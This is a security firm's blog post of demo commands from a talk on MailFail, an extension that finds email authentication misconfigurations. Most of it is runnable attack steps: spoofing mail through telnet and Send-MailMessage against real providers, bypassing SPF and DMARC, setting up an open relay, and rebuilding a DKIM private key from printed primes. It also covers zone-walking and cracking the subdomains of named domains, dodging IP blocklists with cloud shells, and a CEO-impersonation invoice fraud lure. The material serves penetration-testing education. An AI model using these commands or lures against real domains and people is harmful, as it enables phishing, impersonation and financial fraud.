MailFail
Jack Hyland has worked in information security ever since graduating college and has dedicated his free time to deeply learning new techniques and technologies. He now spends his time creating and contributing to open-source projects along with performing security assessments of corporations networks and infrastructure.
This blog is a resource associated with the following webcast and Wild West Hackin’ Fest 2025 talk. The site was previously hosted at https://m.ail.fail but was transferred to the official BHIS blog.
MailFail is a Firefox browser extension that identifies and provides commands to exploit a large number of email-related misconfigurations for the current domain and subdomain. The extension’s UI popup highlights any misconfigurations in red and links to the supporting documentation.
A list of DKIM selectors can be found on GitHub.
You can download the MailFail extension from Mozilla Add-ons.
The MailFail GitHub repository is located at github.com/ACK-J/MailFail.
Learn how to reconstruct private keys from two prime numbers on my Github Gist.
Check out the script for sending DKIM signed emails with a private key on my Github Gist.
Bonus: Use this Python script to check a list of domains for DMARC misconfigurations.
MailFail Webcast Demos
Demo 1: Send an Email with SMTP
dig MX {{TODO}} +short
telnet {{ TODO }} 25
HELO nsa.gov
MAIL FROM:
RCPT TO: {{ TODO }}
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
From: [email protected]
To: {{ TODO }}
Subject: Snowden
--NextMimePart
Content-type: text/html;
We forgive you :(
.Demo 2: Send an Email with Send-MailMessage
dig MX ilebi.com +short
Send-MailMessage -SmtpServer 96-126-99-62.ip.linodeusercontent.com -To [email protected] -From [email protected] -Subject "Congrats!" -Body "You've been accepted!" -BodyAsHTMLDemo 3: Bypass SPF
dig TXT spf.m.ail.fail +short
curl ifconfig.me
telnet mailsec.protonmail.ch 25
HELO spf.m.ail.fail
MAIL FROM:
RCPT TO:
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
From: [email protected]
To: [email protected]
Subject: Piano Man
Message-ID:
--NextMimePart
Content-Type: text/html;
Sing us a song.
.Demo 4: Bypass DKIM
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:1024 -out dkim_1024_private.pem
openssl rsa -pubout -in dkim_1024_private.pem -out dkim_1024_public.pem
cat dkim_1024_public.pem
dig TXT dkim1024._domainkey.m.ail.fail +short
# https://gist.github.com/ACK-J/76585af46375641ec841cb6b77d345c3
wget https://gist.githubusercontent.com/ACK-J/76585af46375641ec841cb6b77d345c3/raw/e52f1a8ae9f83dd080d7a75e27d505dff5350d9b/Send_DKIM_Email.py
vim Send_DKIM_Email.py
python3 Send_DKIM_Email.pyDemo 5: Cracking DKIM Keys
dig TXT smtpapi._domainkey.m.ail.fail +short
# https://gist.github.com/ACK-J/487d0de5737458d953ca818a0645b09b
wget https://gist.githubusercontent.com/ACK-J/487d0de5737458d953ca818a0645b09b/raw/817e9d3c0faeb81844a4a81be6818d582ff493ea/Reconstruct_Private_RSA_Key.py
# Private Key Values of p and q
# 114243475724741248833595122844512882880944338610909134738011440161029226847479
# 98382782872834099683871479139393781262822034994021043042450594450215266838447
vim Reconstruct_Private_RSA_Key.py
python3 Reconstruct_Private_RSA_Key.py
cat > cracked_private_key.pem
# https://gist.github.com/ACK-J/76585af46375641ec841cb6b77d345c3
vim Send_DKIM_Email.py
python3 Send_DKIM_Email.pyDemo 5: DMARC Misconfiguration Check
https://gist.github.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9WWHF Talk Demos
SPF and DMARC Bypass via SMTP Open Relaying
# Here is a website that checks for SMTP open relaying
https://tools.appriver.com/OpenRelay.aspx?server=209.38.78.151
# Installing a postfix open relay
sudo apt install postfix
sudo nano /etc/postfix/main.cf
# Add the following lines
mynetworks = 0.0.0.0/0 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
permit_mynetworks = yes
# Restart postfix
sudo service postfix restart
# Nmap scanning for an open relay
nmap -p 25,587,465 -v --open --script smtp-open-relay 209.38.78.151 | grep "Server is an open relay|MAIL FROM:" -B 6
# Using the open relay
telnet 209.38.78.151 25
HELO smtprelay.me
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
From: [email protected]
To: [email protected]
Subject: Did that invoice go out?
--NextMimePart
Content-Type: text/html;
Hey Mike, this is Jack, your CEO. Did you ever send out that invoice for the holiday party?
If not, here are the routing numbers:
1234567890
I've attached the invoice for your convenience. You should get this done ASAP, or it will affect your performance review.
Sincerely,
Your Boss
.Cracking DKIM RSA Keys
dig TXT smtpapi._domainkey.m.ail.fail +short
# https://gist.github.com/ACK-J/487d0de5737458d953ca818a0645b09b
wget https://gist.githubusercontent.com/ACK-J/487d0de5737458d953ca818a0645b09b/raw/817e9d3c0faeb81844a4a81be6818d582ff493ea/Reconstruct_Private_RSA_Key.py
# Private Key Values of p and q
# 114243475724741248833595122844512882880944338610909134738011440161029226847479
# 98382782872834099683871479139393781262822034994021043042450594450215266838447
vim Reconstruct_Private_RSA_Key.py
python3 Reconstruct_Private_RSA_Key.py
cat > cracked_private_key.pem
# https://gist.github.com/ACK-J/76585af46375641ec841cb6b77d345c3
vim Send_DKIM_Email.py
python3 Send_DKIM_Email.pyFinding SPF/DMARC Misconfigs
# Downloading the script to check for DMARC and SPF misconfigurations
wget https://gist.githubusercontent.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9/raw/5ad366adf6abdaaf981fd8bede5223f543e4242c/DMARC_and_SPF_Check.py
# Downloading a file of the top one million domain names
wget https://downloads.majesticseo.com/majestic_million.csv
# Formatting the file
cat majestic_million.csv | tail -n +2 | cut -d ',' -f 3 > majestic_million.csv.txt
# Running the script with the formatted file
python3 DMARC_and_SPF_Check.py majestic_million.csv.txt
# Showing that a domain's SPF record is pointing at my current IP address
dig TXT spf.m.ail.fail +short
# Showing my current IP
curl ifconfig.me
# Connecting to Proton Mail's email server
# Spoof SPF
# Take advantage of the domain's misconfigured SPF and DMARC records
telnet mailsec.protonmail.ch 25
HELO spf.m.ail.fail
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
To: [email protected]
From: [email protected]
Subject: Your Inbox Has Fallen to the Dark Side
--NextMimePart
Content-Type: text/html;
I find your email habits... disturbing.
Effective immediately:
- "Free lightsaber!" will trigger a full investigation by the Empire.
May the inbox be with you.
Darth Vader
Sith Lord & Email Administrator
.Spoof Misconfigured DMARC and SPF
# Open a cloud shell using portal.azure.com
# get the MX record of the victim domain and substitute it below as the SMTP server
# If your IP gets blocked by Spamhaus, restart cloud shell to get a new IP
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To "[email protected]" -From "[email protected]" -Subject "Misconfigured DMARC" -Body "Misconfigured DMARC" -BodyAsHTML -DeliveryNotificationOption Never -UseSslSpoofing DMARC PCT!=100
# Downloading the script to check for DMARC and SPF misconfigurations
wget https://gist.githubusercontent.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9/raw/5ad366adf6abdaaf981fd8bede5223f543e4242c/DMARC_and_SPF_Check.py
# Downloading a file of the top one million domain names
wget https://downloads.majesticseo.com/majestic_million.csv
# Formatting the file
cat majestic_million.csv | tail -n +2 | cut -d ',' -f 3 > majestic_million.csv.txt
# Check for domains with pct= in the DMARC policy
python3 DMARC_and_SPF_Check.py majestic_million.csv.txt | grep "less than 100%"
# An easy way to send spoofed emails is with Cloud Shell on portal.azure.com
# Replace the SMTP server and victim email below
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To [email protected] -From [email protected] -Subject "Howdy" -Body "Misconfigured DMARC" -BodyAsHTML -DeliveryNotificationOption Never -UseSslSpoofing Internal Emails via Direct Send
# Replace the SMTP server with a M365 MX record and the To and From fields
Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To [email protected] -From [email protected] -Subject "Microsoft Direct Send Spoofing Test" -Body "Microsoft Direct Send Spoofing Test" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl NSEC Walking
# Install the dependencies
sudo apt-get install pipx python3 python3-pip python3-dev gcc libssl3 libssl-dev
# Install n3map using pipx
pipx install n3map[predict]
# NSEC walk Stanford
n3map -v -A --output www.stanford.edu.zone stanford.edu
# View the results
vim www.stanford.edu.zoneNSEC3 Walking and Cracking
# Install the dependencies
sudo apt-get install pipx python3 python3-pip python3-dev gcc libssl3 libssl-dev
# Install n3map using pipx
pipx install n3map[predict]
# NSEC3 walk nsa.gov
n3map -v -A --output nsa.gov.zone nsa.gov --predict
# View the results
vim nsa.gov.zone
# Convert the results to hashcat format
n3map-hashcatify nsa.gov.zone nsa.gov.hashcat
# Crack the subdomains using hashcat
hashcat --potfile-disable -m 8300 nsa.gov.hashcat /opt/wordlists/goldmine-2024-small.txtSpoofed Reply-To: Header
# Showing that a domain's SPF record is pointing at my current IP address
dig TXT spf.m.ail.fail +short
# Showing my current IP
curl ifconfig.me
# Connect to protonmail's SMTP server
# Spoof SPF
# Include a Reply-To: header with a different email
telnet mailsec.protonmail.ch 25
HELO spf.m.ail.fail
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Content-Type: multipart/mixed; boundary="NextMimePart"
To: [email protected]
Reply-To: [email protected]
From: [email protected]
Subject: Your Inbox Has Fallen to the Dark Side
--NextMimePart
Content-Type: text/html;
I find your email habits... disturbing.
Effective immediately:
- "Free lightsaber!" will trigger a full investigation by the Empire.
May the inbox be with you.
Darth Vader
Sith Lord & Email Administrator
.